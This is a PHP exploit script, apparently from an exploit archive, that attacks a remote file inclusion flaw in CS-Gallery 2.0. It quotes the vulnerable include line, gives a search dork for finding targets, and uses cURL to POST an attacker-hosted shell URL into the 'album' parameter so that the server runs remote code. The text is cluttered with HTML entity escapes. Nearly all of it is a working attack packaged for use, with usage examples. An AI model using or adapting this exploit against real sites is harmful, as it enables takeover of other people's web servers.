CS-Gallery 2.0 (index.php album) Remote File Include Exploit

                                                <?php

//File&nbsp;Inclusion&nbsp;Exploit&nbsp;for&nbsp;CS_Gallery&nbsp;<=&nbsp;2.0
//Found&nbsp;and&nbsp;Exploit&nbsp;Coded&nbsp;by&nbsp;burncycle&nbsp;-&nbsp;burncycle[(at)]hotmail[(dot)]de
//|
//Vendor:&nbsp;http://www.cschneider.de/
//Dork:&nbsp;.&nbsp;www.cschneider.info
//|
//Bug&nbsp;in&nbsp;\"index.php\":
//..
//$codefile=$_POST[\'album\'].\'/code.php\';
//include&nbsp;$codefile;
//..
//|
//Usage:&nbsp;php&nbsp;exploit.php&nbsp;[pathtoscript]&nbsp;[pathtoshell]
//Example:&nbsp;php&nbsp;exploit.php&nbsp;http://pathtoscript.com/cs_gallery/(index.php?todo=securealbum)&nbsp;http://pathtoshell.com/(code.php)
//|
//Needs&nbsp;the&nbsp;cURL&nbsp;extension&nbsp;of&nbsp;PHP
//Works&nbsp;regardless&nbsp;of&nbsp;PHP&nbsp;settings

//Nur&nbsp;ausnahme&nbsp;Fehler&nbsp;anzeigen
error_reporting(1);

echo&nbsp;\"Usage:&nbsp;php&nbsp;\".$_SERVER[\"argv\"][0].\"&nbsp;[pathtoscript]&nbsp;[pathtoshell]

\";
echo&nbsp;\"Example:&nbsp;php&nbsp;\".$_SERVER[\"argv\"][0].\"&nbsp;http://pathtoscript.com/cs_gallery/(index.php?todo=securealbum)&nbsp;http://pathtoshell.com/(code.php)

\";

//Schauen&nbsp;ob&nbsp;alles&nbsp;angegeben&nbsp;wurde
if(!empty($_SERVER[\"argv\"][1])&nbsp;&&&nbsp;!empty($_SERVER[\"argv\"][2]))
{

$pathtoscript&nbsp;=&nbsp;$_SERVER[\"argv\"][1];
$pathtoshell&nbsp;=&nbsp;$_SERVER[\"argv\"][2];

//erzeuge&nbsp;ein&nbsp;neues&nbsp;cURL&nbsp;Handle
$ch&nbsp;=&nbsp;curl_init();

//setzte&nbsp;die&nbsp;URL&nbsp;und&nbsp;andere&nbsp;Optionen
curl_setopt($ch,&nbsp;CURLOPT_URL,&nbsp;$pathtoscript.\"index.php?todo=securealbum\");
curl_setopt($ch,&nbsp;CURLOPT_HEADER,&nbsp;0);
curl_setopt($ch,&nbsp;CURLOPT_POST,&nbsp;1);
curl_setopt($ch,&nbsp;CURLOPT_POSTFIELDS,&nbsp;\"album=\".$pathtoshell);

//f.hre&nbsp;die&nbsp;Aktion&nbsp;aus
curl_exec($ch);

//schlie.e&nbsp;das&nbsp;Handle&nbsp;und&nbsp;gebe&nbsp;Systemresourcen&nbsp;frei
curl_close($ch);

}

?>

&nbsp;